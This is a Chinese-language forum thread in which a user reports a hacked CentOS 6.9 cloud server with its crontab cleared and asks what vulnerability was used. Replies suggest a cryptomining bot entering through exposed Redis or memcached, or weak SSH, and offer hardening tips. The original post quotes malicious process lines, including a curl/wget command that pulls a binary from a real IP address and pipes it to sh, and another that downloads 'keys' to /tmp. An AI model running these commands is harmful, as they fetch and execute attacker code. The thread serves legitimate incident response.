云主机被哪位大佬入侵了,清空了我的 crontab。并未破坏我的其他主要文件。 多了三个进程
1 curl -s https://blockchain.info/balance?cors=true&active=
2 /bin/sh -c (curl -s http://185.164.72.119/log_rotate.bin||wget -q -O- http://185.164.72.119/log_rotate.bin)|sh
3 curl -o /tmp/keys http://178.32.46.58/keys
执行的脚本如下: https://ideone.com/4OR7Xr
我的主机系统版本:
# lsb_release -a
LSB Version: unavailable
Distributor ID: CentOS
Description: CentOS release 6.9 (Final)
Release: 6.9
Codename: Final
# uname -a
Linux vt1 2.6.32-696.20.1.el6.x86_64 #1 SMP Fri Jan 26 17:51:45 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
计算机密码随机大小写字母+数字+特殊符号。 V2 大佬们帮分析,是用了哪个漏洞入侵的?
附上所有端口使用情况: https://ideone.com/jKCXUh
我怀疑是openssh版本太低,系统默认的5.3p1
# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
上午折腾升级到最新版本
# ssh -V
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
1
asd940808 2019-12-17 16:08:31 +08:00 1
改端口,禁 root 和密码登录。用密钥登录,应该就能避免绝大部分的入侵了吧?
|
3
lovelynn 2019-12-17 19:25:49 +08:00 1
你有没有开 redis 一般 crontab 修改的都是 redis 未授权访问
|
6
akmonde 2019-12-18 10:54:24 +08:00 1
这就是挖矿的脚本,memcached 看看是不是空口令弱口令~杀掉进程,删除 blockchain 下载的挖矿脚本,改下密码就行~
|
7
nicevar 2019-12-18 11:59:09 +08:00 1
一般就那几点时,ssh 默认 22 端口还允许 root 登陆、redis/MySQL 之类暴露公网了、站点有漏洞让拿到 webshell
|
8
nicevar 2019-12-18 12:02:30 +08:00
另外这可能都不是人为直接操作入侵的,大佬没必要盯着一台小服务器浪费时间,估计就是自动入侵程序随机扫描搞定了
|
9
tomychen 2019-12-18 14:06:47 +08:00 1
先说说开了哪些服务,这是其一
其二是很多小的 vps 提供商可能被默认值入或者被 hacking 值入模版... |
11
tomychen 2019-12-18 14:34:29 +08:00
@zzugyl 我指的是 web redis 等等这种 bind 0.0.0.0 暴露的,或者通过接口能够访问到的
因为直写 crontab 说明已经 root 了 |
12
smallgoogle 2019-12-18 17:23:55 +08:00 1
你可能是 web 漏洞 然后被提权了而已。
|
13
zzugyl OP 我把 openssh 升级到最新版。把 memcached 指定到 127.0.0.1。顺便更新了一下系统。看看明天还会不会被入侵。
|